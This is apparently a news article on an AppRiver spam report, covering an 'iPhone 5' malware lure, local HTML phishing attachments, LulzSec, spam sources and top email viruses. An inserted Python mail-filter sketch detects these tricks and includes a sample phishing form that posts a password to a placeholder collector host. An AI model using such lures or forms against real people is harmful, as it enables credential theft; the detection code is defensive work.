Spam campaign hypes the ‘iPhone 5’ but delivers malware

The advertisement has links to a malicious web page that hosts a file named iphone5.gif.exe. The file infects the users' PCs and creates a backdoor to the machine, the report found.

“The spam went out right before Apple’s World Wide Developers Conference, so it could snag a few people”, Fred Touchette, senior security analyst with AppRiver, told Infosecurity. The conference was held June 6-10 in San Francisco.

The report also found an increase in HTML spam, virus, and phishing attacks using attachments. The attachments are used to trick recipients into believing they are on a legitimate webpage, in order to veil the hackers' true intentions.

“In this method, spammers send an attachment. Once it is opened, some people might be tricked into thinking they are visiting an actual webpage; in actuality, it is local to their machine. Once they fill out the phishing form and hit submit, [the information is sent] off to a website [where the hackers] are storing the information. That way, they can keep that site up and operational longer”, Touchette explained.
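As an added illustration (not from the AppRiver report), the following sketch shows how a mail filter could flag the two attachment tricks described above: a decoy double extension such as iphone5.gif.exe, and an HTML attachment whose form submits to a remote server. The extension lists, the helper names and the collector.example host are assumptions chosen for the example.

```python
from email import message_from_string, policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

# Illustrative lists (assumptions), not an exhaustive policy.
EXECUTABLE = {"exe", "scr", "pif", "com", "bat", "cmd"}   # runs when opened
DECOY = {"gif", "jpg", "png", "pdf", "doc", "txt"}        # what the name pretends to be

class FormFinder(HTMLParser):
    """Collect form actions that leave the local file for a remote host."""
    def __init__(self):
        super().__init__()
        self.remote_actions = []
    def handle_starttag(self, tag, attrs):
        action = dict(attrs).get("action") or ""
        if tag == "form" and urlparse(action).scheme in ("http", "https"):
            self.remote_actions.append(action)

def scan_message(raw):
    """Return (kind, filename, detail) findings for one raw RFC 5322 message."""
    findings = []
    msg = message_from_string(raw, policy=policy.default)
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        pieces = name.rsplit(".", 2)
        if len(pieces) == 3 and pieces[2] in EXECUTABLE and pieces[1] in DECOY:
            findings.append(("double-extension", name, pieces[2]))
        if part.get_content_type() == "text/html":
            finder = FormFinder()
            finder.feed(part.get_content())
            findings += [("remote-form", name, a) for a in finder.remote_actions]
    return findings

def build_message(attachments):
    """Constructed sample mail: attachments is a list of (filename, content)."""
    msg = EmailMessage()
    msg["Subject"] = "constructed sample"
    msg.set_content("See attachment.")
    for filename, content in attachments:
        if isinstance(content, bytes):
            msg.add_attachment(content, maintype="application",
                               subtype="octet-stream", filename=filename)
        else:
            msg.add_attachment(content, subtype="html", filename=filename)
    return msg.as_string()

# Constructed inputs; collector.example is a placeholder host.
PHISH_FORM = '<form action="https://collector.example/submit"><input name="pw" type="password"></form>'
SAMPLE = build_message([("iphone5.gif.exe", b"MZ"), ("account.html", PHISH_FORM)])

if __name__ == "__main__":
    for finding in scan_message(SAMPLE):
        print(finding)
```

A form with a relative action stays on the local file and is not flagged; only an absolute http or https action is reported as a remote form.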

Another noteworthy occurrence in June was the rash of attacks by LulzSec against many governmental and corporate targets. “They were attacking public-facing web servers and databases, and the real damage they did…was releasing users' passwords and all this personal information; it was really unnecessary”, Touchette said. “Overall, I think it was a publicity grab”, he added.

In terms of spam origination, Russia held onto the top spot for the third month in a row, according to the monthly spam report. South Korea jumped two spots to take third place, with India in second place.

By region, Asia was the top source of spam, making up 40.3% of spam origination worldwide. Europe was second, with 26.2% of the world total, and North America was third, with 16.2%.

According to the AppRiver report, the top 10 email-delivered viruses were: X.W32.Sasfis.pak, X.UPX.App.pakuber, W32\Mydoom.O, X.W32.Buzus.pak, W32\Mydoom.R_worm, X.W32.Netsky.Q, W32\Merond.O_worm, W32\Mydoom.N, W32\Netsky.C, and X.UPX.App.pakuberb. The virus names that begin with “X.” signify rules that were written by AppRiver analysts.

Spam activity started off slow, but spiked in the second week of June, when the AppRiver filters began to catch millions of pieces per day. “Though it is normal for virus traffic patterns to rise and fall with associated botnet activity, this wave seems to be remaining strong”, the report noted.

In addition, there was an increase in the use of the McDonald’s brand in spam. In June, emails began circulating claiming to be coupons for free food at the fast food chain, but the emails contained malware, not free food coupons, the report noted.
